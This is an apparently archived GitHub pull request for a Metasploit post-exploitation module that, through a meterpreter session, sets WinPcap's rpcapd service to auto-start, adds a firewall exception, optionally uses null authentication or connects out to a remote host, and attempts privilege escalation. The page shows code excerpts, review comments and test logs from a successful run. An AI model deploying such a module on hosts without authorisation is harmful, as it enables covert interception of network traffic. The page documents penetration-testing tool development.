Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Already on GitHub? Sign in to your account

Post windows module to start rpcapd service (active/pasive mode) #761

Merged
merged 3 commits into from Nov 28, 2012

Conversation

Projects
None yet
3 participants
Contributor

BorjaMerino commented Sep 5, 2012

The module enables the Remote Packet Capture System (rpcapd service) included in the default installation of Winpcap. The module allows you to set up the service in passive or active mode (useful if the client is behind a firewall).

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012

modules/post/windows/manage/rpcapd_start.rb
+ This module enables the Remote Packet Capture System (rpcapd service)
+ included in the default installation of Winpcap. The module allows you to set up
+ the service in passive or active mode (useful if the client is behind a firewall).
+ If authentication is enabled you need a local user account to capture traffic.
+ PORT will be used depending of the mode configured.},
+ 'License' => BSD_LICENSE,
+ 'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options(
+ [
+ OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
+ OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
+ OptBool.new('GETSYSTEM', [ true, 'Try to get System privilege.', true]),
@jlee-r7

jlee-r7 Sep 6, 2012

Contributor

Modules should not run getsystem. Check for necessary privileges and tell the user if they need to run it.

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012

modules/post/windows/manage/rpcapd_start.rb
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options(
+ [
+ OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
+ OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
+ OptBool.new('GETSYSTEM', [ true, 'Try to get System privilege.', true]),
+ OptAddress.new('RHOST', [ false, 'Remote host to connect (set in active mode only).']),
+ OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.',2002])
+ ], self.class)
+ end
+
+ def run
+ #Check platform to avoid problems with getsystem (e.g. java/java)
+ if check_perm and client.platform =~ /win32|win64/i
@jlee-r7

jlee-r7 Sep 6, 2012

Contributor

Artificial restriction. This is a fairly simple task that should work just fine on java or a shell session.

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012

modules/post/windows/manage/rpcapd_start.rb
+ print_good("Got System")
+ return true
+ else
+ print_error("Couldn't get System")
+ return false
+ end
+ elsif !is_admin? and datastore['GETSYSTEM']==false
+ return false
+ else # is_admin? = true
+ return true
+ end
+ end
+
+ def run_rpcapd(p)
+ begin
+ client.sys.process.execute("cmd.exe /c sc config rpcapd binpath= \"#{p}\" ",nil, {'Hidden' => 'true', 'Channelized' => true})
@jlee-r7

jlee-r7 Sep 6, 2012

Contributor

You should avoid process.execute when cmd_exec will do (i.e., unless you need to use a token). Using process.execute means this can't run on a shell session.

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012

modules/post/windows/manage/rpcapd_start.rb
+ print_status("Rpcapd is already running. Restarting service ...")
+ if service_stop("rpcapd") and service_start("rpcapd")
+ print_good("Service restarted successfully: #{p}")
+ else
+ print_error("There was an error restarting rpcapd.exe. Try to run it again")
+ end
+ end
+ rescue::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
+ end
+ end
+
+ def fw_enable(prog)
+ print_status ("Enabling rpcapd.exe in Windows Firewall")
+ begin
+ if (client.fs.file.exists?(prog))
@jlee-r7

jlee-r7 Sep 6, 2012

Contributor

use the methods from Post::File which are platform and session type independent.

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012

modules/post/windows/manage/rpcapd_start.rb
+ OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.',2002])
+ ], self.class)
+ end
+
+ def run
+ #Check platform to avoid problems with getsystem (e.g. java/java)
+ if check_perm and client.platform =~ /win32|win64/i
+ serv = service_info("rpcapd")
+ print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
+
+ if serv['Name'] !~ /remote/i
+ print_error("This machine doesn't seem to have the rpcapd service")
+ else
+ print_status("Rpcap service found: #{serv['Name']}")
+ reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
+ prog=client.fs.file.expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
@jlee-r7

jlee-r7 Sep 6, 2012

Contributor

use expand_path from the Post::File mixin instead.

Contributor

BorjaMerino commented Sep 7, 2012

Hi @jlee-r7 thanks for all the explanations

Contributor

jvazquez-r7 commented Nov 27, 2012

Tested successfully:

msf  exploit(handler) > use post/windows/manage/rpcapd_start 
msf  post(rpcapd_start) > show options
Module options (post/windows/manage/rpcapd_start):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ACTIVE    false            yes       Enable rpcapd in active mode (passive by default).
   NULLAUTH  true             yes       Enable Null Authentication.
   PORT      2002             yes       Local/Remote port to capture traffic.
   RHOST                      no        Remote host to connect (set in active mode only).
   SESSION                    yes       The session to run this module on.
msf  post(rpcapd_start) > show sessions
Active sessions
===============
  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  JUAN-C0DE875735\Administrator @ JUAN-C0DE875735  192.168.1.129:4444 -> 192.168.1.147:1743 (192.168.1.147)
msf  post(rpcapd_start) > set SESSION 1
SESSION => 1
msf  post(rpcapd_start) > run
[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Setting rpcapd as 'auto' service
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002) 
[+] Rpcapd started successfully: C:\Program Files\winpcap\rpcapd.exe -d -p 2002 -n
[*] Post module execution completed

After that I'm able to connect to the remote interface on the port 2002 and capture traffic from a remote host.

Contributor

BorjaMerino commented Nov 27, 2012

@jvazquez-r7 Thank you so much for checking it out

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 27, 2012

modules/post/windows/manage/rpcapd_start.rb
+ serv = service_info("rpcapd")
+ print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
+
+ if serv['Name'] !~ /remote/i
+ print_error("This machine doesn't seem to have the rpcapd service")
+ else
+ print_status("Rpcap service found: #{serv['Name']}")
+ reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
+ prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
+ if reg != 2
+ print_status("Setting rpcapd as 'auto' service")
+ service_change_startup("rpcapd","auto")
+ end
+ if datastore['ACTIVE']==true
+ print_error("RHOST is not set ") if datastore['RHOST']==nil
+ p = prog << " -d -a #{datastore['RHOST']},#{datastore['PORT']} -v "
@jvazquez-r7

jvazquez-r7 Nov 27, 2012

Contributor

As @jlee-r7 has pointed, could happen that RHOST is nil. It doesn't seem to have sense when running in active mode, has it?

If RHOST is always needed to run in active mode, in case of RHOST being nil, just print_error to warn the user and return.

Thanks @jlee-r7 for keep pointing!

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 27, 2012

modules/post/windows/manage/rpcapd_start.rb
+ include Msf::Post::Windows::Registry
+ include Msf::Post::Windows::WindowsServices
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Common
+ include Msf::Post::File
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Enable Remote Packet Capture Service',
+ 'Description' => %q{
+ This module enables the Remote Packet Capture System (rpcapd service)
+ included in the default installation of Winpcap. The module allows you to set up
+ the service in passive or active mode (useful if the client is behind a firewall).
+ If authentication is enabled you need a local user account to capture traffic.
+ PORT will be used depending of the mode configured.},
+ 'License' => BSD_LICENSE,
@jvazquez-r7

jvazquez-r7 Nov 27, 2012

Contributor

Can MSF_LICENSE be used? of you would like to use BSD_LICENSE?

Contributor

BorjaMerino commented Nov 27, 2012

@jvazquez-r7 yes of course MSF_LICENSE, I was wrong to write it and I've just seen that I also put BSD_LICENCE in the safe delete (sdel). Could you please change it?

Thank you

Contributor

jvazquez-r7 commented Nov 28, 2012

@bmerinofe sure I can change the license type for you when merging, no problem! :)

Is there any response for the comment about the RHOST being nil in the active mode? (see above :) )

Contributor

jvazquez-r7 commented Nov 28, 2012

Awesome, looks good! and works as expected, merging!

msf  post(rpcapd_start) > show options
Module options (post/windows/manage/rpcapd_start):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ACTIVE    false            yes       Enable rpcapd in active mode (passive by default).
   NULLAUTH  true             yes       Enable Null Authentication.
   PORT      2002             yes       Local/Remote port to capture traffic.
   RHOST                      no        Remote host to connect (set in active mode only).
   SESSION                    yes       The session to run this module on.
msf  post(rpcapd_start) > set session 1
session => 1
msf  post(rpcapd_start) > rexploit
[*] Reloading module...
[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002) 
[+] Rpcapd started successfully: C:\Program Files\winpcap\rpcapd.exe -d -p 2002 -n
[*] Post module execution completed
msf  post(rpcapd_start) > set ACTIVE true
ACTIVE => true
msf  post(rpcapd_start) > rexploit
[*] Reloading module...
[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[-] RHOST is not set 
[*] Post module execution completed

@jvazquez-r7 jvazquez-r7 merged commit cdd9eb1 into rapid7:master Nov 28, 2012

1 check passed

default The Travis build passed
Details
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment